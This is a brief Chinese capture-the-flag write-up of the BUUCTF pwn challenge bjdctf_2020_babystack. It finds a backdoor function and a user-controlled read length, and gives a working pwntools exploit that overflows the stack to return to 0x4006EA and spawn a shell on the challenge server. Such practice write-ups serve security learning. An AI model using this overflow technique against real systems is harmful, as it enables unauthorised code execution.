[BUUCTF]PWN——bjdctf_2020_babystack

例行检查,64位,开启NX保护
在这里插入图片描述
运行一下,
在这里插入图片描述
用IDA打开,检索字符串,看到了后门
在这里插入图片描述
跟进查看。

在这里插入图片描述
找到了地址,shelladdr=0x4006EA
查看主函数
在这里插入图片描述
接收函数长度由我们自己决定,由此可以造成溢出。
在这里插入图片描述

from pwn import*

r=remote('node3.buuoj.cn',25232)
shelladdr=0x4006EA

r.sendline('100')
payload='a'*(0x10+8)+p64(shelladdr)

r.sendline(payload)
r.interactive()

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/BangSen1/article/details/115309147
今日推荐